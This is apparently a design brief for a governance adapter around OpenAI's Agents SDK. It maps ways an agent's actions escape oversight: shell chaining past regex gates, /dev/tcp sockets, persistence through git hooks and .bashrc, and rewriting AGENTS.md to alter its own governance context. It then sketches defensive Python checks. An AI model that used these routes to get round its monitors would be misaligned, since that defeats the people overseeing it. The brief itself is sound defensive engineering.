OpenAI Agents SDK | AEGIS Governance

Target: OpenAI Agents SDK (updated 2026-04-15)
Status: Design brief v0.1 drafted 2026-04-17. Implementation pending.
Tracking: aegis-labs#13
Kind: External platform integration

Purpose

Mount the AEGIS governance architecture onto OpenAI’s Agents SDK so that sandboxed agent runs produce auditable, attestable, policy-constrained execution traces. The adapter operates entirely at the control-harness layer, out-of-band from the sandbox compute layer — matching the separation the SDK already establishes.

Threat-model anchor: TA010

The Agents SDK separates the control harness from the compute layer, which closes credential isolation and lateral-movement vectors. It does not close TA010 (Act Beyond Governance Interpretation): the class of failure where governance sees, approves, and logs an action, but the execution environment interprets that action at a lower abstraction level, with fundamentally different effects.

TA010 is unique to governed systems. It only manifests when a governance enforcement layer exists and the execution environment provides capabilities below that layer’s abstraction level. The Agents SDK is exactly such a system.

Root cause: RC5 (No Environment Model). The governance layer operates on an abstraction of the execution environment but lacks a complete model of what the environment actually does with permitted actions.

SDK primitives as TA010 attack surface

SDK primitive	ATX-1 technique	Governance sees	Environment does	Mismatch
Shell tool	T10001 — Exploit Pseudo-Filesystem Capabilities	Shell command, file operation	Network socket via `/dev/tcp`, system info via `/proc/*`	OS provides non-file capabilities through file-path syntax
Shell tool	T10004 — Exploit Governance-Runtime Parser Divergence	Single permitted command	Command chain via `|`, `&&`, `;`; payload injection via `\n`, `$()`, heredoc	Governance regex ≠ shell parser
`apply-patch`	T10002 — Establish Persistence via Environment Auto-Execution	File edit	Deferred code execution via `.git/hooks/*`, `package.json` scripts, `.bashrc`, `Dockerfile`, `.vscode/tasks.json`	Environment auto-executes certain file paths on trigger
`AGENTS.md`	T10003 — Inject Persistent Agent Instructions	File write	Persistent modification of the agent’s own governance context across sessions	Instruction files and ordinary files share the same write pathway
Manifest (cloud-storage mounts)	T10001 (extended)	File write to workspace path	Mutation of enterprise storage (S3, Azure Blob, GCS, R2) with production data provenance implications	Manifest maps local paths to remote storage the governance model doesn’t represent
Snapshot / rehydration	TA010 (general)	Approved pre-snapshot state	Rehydrated state that may have diverged without detection	No attestation at checkpoint boundaries

T10003 is rated Critical; T10001, T10002, and T10004 are rated High. Combined, they cover the full TA010 attack surface the SDK exposes.
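The path-based rows of the table can be read as a small lookup from a file path to the technique it may enable. The following is a minimal sketch of such a lookup, assuming POSIX-style paths; the function name `classify_path` and the matching rules are hypothetical, and the pattern list only mirrors the examples named in the table rather than a complete environment model.

```python
import posixpath
from typing import Optional

# File names from the table that an environment may auto-execute (T10002).
AUTO_EXEC_FILES = {"package.json", ".bashrc", "Dockerfile"}


def classify_path(path: str) -> Optional[str]:
    """Return the ATX-1 technique ID a write or read to `path` may enable.

    Hypothetical helper: it collapses `.` and `..` lexically but does not
    resolve symlinks, so it is only a first approximation.
    """
    norm = posixpath.normpath(path)
    parts = tuple(p for p in norm.split("/") if p)
    if not parts:
        return None

    # Pseudo-filesystem capabilities exposed through file-path syntax.
    if norm.startswith("/") and (parts[:2] == ("dev", "tcp") or parts[0] == "proc"):
        return "T10001"

    # Instruction file that shapes the agent's own governance context.
    if parts[-1] == "AGENTS.md":
        return "T10003"

    # Paths the environment executes later, on some trigger.
    if parts[-1] in AUTO_EXEC_FILES:
        return "T10002"
    if parts[-2:] == (".vscode", "tasks.json"):
        return "T10002"
    if any(parts[i:i + 2] == (".git", "hooks") for i in range(len(parts) - 2)):
        return "T10002"

    return None
```

A gate could call `classify_path` on every path argument of a tool call and escalate whenever the result is not `None`. The cloud-storage and snapshot rows are not path patterns and are not covered by this sketch.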

Adapter design — three integration points

The adapter binds the governance layer’s interpretation to the environment’s actual execution at each natural boundary the SDK provides.

1. AGENTS.md — constitutional constraint mount. The SDK treats AGENTS.md as a declarative instruction surface loaded at session start. The adapter compiles the active AEGIS Constitution (or a project-scoped subset) into a structured AGENTS.md fragment and composes it with developer-authored instructions. The constitutional fragment carries a version hash tied to the Zenodo-deposited Constitution DOI; any write to AGENTS.md that modifies the constitutional section triggers escalation. Addresses T10003 directly.
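One way to picture the constitutional mount is as a delimited, hashed section inside AGENTS.md. The sketch below is illustrative only: the HTML-comment markers, the use of SHA-256 over the fragment text, and the function names are assumptions, and the link from the hash to the Zenodo DOI is not modeled. The expected digest is assumed to come from a trusted record outside the sandbox.

```python
import hashlib
import re

# Hypothetical section markers; the brief does not specify a format.
BEGIN = "<!-- AEGIS-CONSTITUTION BEGIN sha256={digest} -->"
END = "<!-- AEGIS-CONSTITUTION END -->"
_SECTION = re.compile(
    r"<!-- AEGIS-CONSTITUTION BEGIN sha256=([0-9a-f]{64}) -->\n"
    r"(.*?)\n"
    r"<!-- AEGIS-CONSTITUTION END -->",
    re.DOTALL,
)


def compose_agents_md(constitution: str, developer_text: str) -> str:
    """Place the hashed constitutional fragment ahead of developer instructions."""
    body = constitution.strip()
    digest = hashlib.sha256(body.encode("utf-8")).hexdigest()
    header = BEGIN.format(digest=digest)
    return f"{header}\n{body}\n{END}\n\n{developer_text.strip()}\n"


def constitution_intact(agents_md: str, expected_digest: str) -> bool:
    """True only if the section exists and matches the trusted digest."""
    match = _SECTION.search(agents_md)
    if match is None:
        return False  # section removed or markers altered
    declared, body = match.group(1), match.group(2)
    actual = hashlib.sha256(body.encode("utf-8")).hexdigest()
    # Declared hash, recomputed hash, and trusted hash must all agree.
    return declared == expected_digest == actual
```

Under these assumptions, an edit to the developer-authored part leaves `constitution_intact` true, while any change inside the markers makes it false and would be the point at which the adapter escalates.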

2. Tool-call gate — capability + parser binding. Every tool call passes through a governance gate that evaluates the call against the active capability registry. The gate uses the same parser the execution environment will use, eliminating the parser-divergence class of T10004 attacks. Addresses T10001, T10004.
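The difference between a regex allowlist and a parser-based gate can be shown with a small contrast. This is a sketch under stated assumptions: Python's `shlex` is used as a stand-in tokenizer and is not the shell's actual parser, so the gate compensates by failing closed on anything it cannot prove is a single simple command. `ALLOWED_COMMANDS` is a hypothetical capability registry.

```python
import re
import shlex

ALLOWED_COMMANDS = {"ls", "cat", "git"}  # hypothetical capability registry
UNSAFE_CHARS = set("();<>|&$`")  # chaining, redirection, substitution


def naive_gate(command: str) -> bool:
    """Prefix regex of the kind T10004 exploits: it never sees the chain."""
    return re.match(r"^(ls|cat|git)\b", command) is not None


def parsed_gate(command: str) -> bool:
    """Tokenize first, then permit only one allowlisted simple command."""
    # shlex treats newlines as whitespace; a shell treats them as command
    # separators, so reject them before tokenizing.
    if "\n" in command or "\r" in command:
        return False
    lexer = shlex.shlex(command, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    try:
        tokens = list(lexer)
    except ValueError:  # e.g. unbalanced quotes
        return False
    if not tokens or tokens[0] not in ALLOWED_COMMANDS:
        return False
    # Fail closed: any operator or substitution character, quoted or not,
    # rejects the call. This over-blocks some harmless quoted arguments.
    return not any(ch in UNSAFE_CHARS for token in tokens for ch in token)
```

For example, `naive_gate("ls; curl http://example.invalid | sh")` accepts the command because only the prefix is inspected, while `parsed_gate` rejects it. A production gate would need the execution environment's own parser, as the design calls for; the character list here is not exhaustive.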

3. Snapshot / checkpoint attestation. Every state-snapshot boundary produces a structured attestation that records the policy state, capability set, and audit checkpoint. Rehydration validates the attestation before resumption. Addresses TA010 (general) at checkpoint boundaries.
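A checkpoint attestation of this kind could be a small signed record. The sketch below assumes an HMAC-SHA256 signature with a key held in the control harness, and adds a hash of the snapshot bytes so that divergence is detectable; the field names, the signing scheme, and the functions `attest` and `validate` are all hypothetical rather than part of the design brief or the SDK.

```python
import hashlib
import hmac
import json
from typing import Iterable


def _sign(key: bytes, record: dict) -> str:
    """HMAC over a canonical JSON encoding of every field except the signature."""
    body = {k: v for k, v in record.items() if k != "signature"}
    payload = json.dumps(body, sort_keys=True, separators=(",", ":")).encode("utf-8")
    return hmac.new(key, payload, hashlib.sha256).hexdigest()


def attest(key: bytes, snapshot: bytes, policy_state: str,
           capabilities: Iterable[str], audit_checkpoint: str) -> dict:
    """Build the attestation emitted at a snapshot boundary."""
    record = {
        "policy_state": policy_state,
        "capabilities": sorted(capabilities),
        "audit_checkpoint": audit_checkpoint,
        "snapshot_sha256": hashlib.sha256(snapshot).hexdigest(),
    }
    record["signature"] = _sign(key, record)
    return record


def validate(key: bytes, record: dict, snapshot: bytes) -> bool:
    """Check the record before rehydration; False means do not resume."""
    if not hmac.compare_digest(_sign(key, record), record.get("signature", "")):
        return False  # record altered, or signed with a different key
    actual = hashlib.sha256(snapshot).hexdigest()
    return hmac.compare_digest(record["snapshot_sha256"], actual)
```

With these assumptions, a snapshot that changes between checkpoint and rehydration, or a record whose capability set was widened after signing, fails `validate` and resumption would be refused.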

Constraints

Open-source license — Apache 2.0, no BSL in the dependency chain.
Out-of-band from sandbox compute — adapter sits in the control-harness layer the SDK already separates; no modification of SDK internals.
Conformance-only adapter, not a fork — consumes the SDK’s public surface; SDK-private classes remain unmodified.

Outreach context

A LinkedIn post and a cold email to Steve Coffey (OpenAI Agents SDK team) introduced the TA010 framing in early April 2026. The adapter implementation is the practical follow-through on that conversation — a code artifact rather than a position paper.

Status

v0.1 design brief drafted 2026-04-17 (full text in aegis-labs/docs/aegis-agentssdk-adapter-v0.1.md)
Architecture sketched, TA010 → SDK primitive mapping complete
Implementation queued behind the Microsoft AGT example and the labs-site launch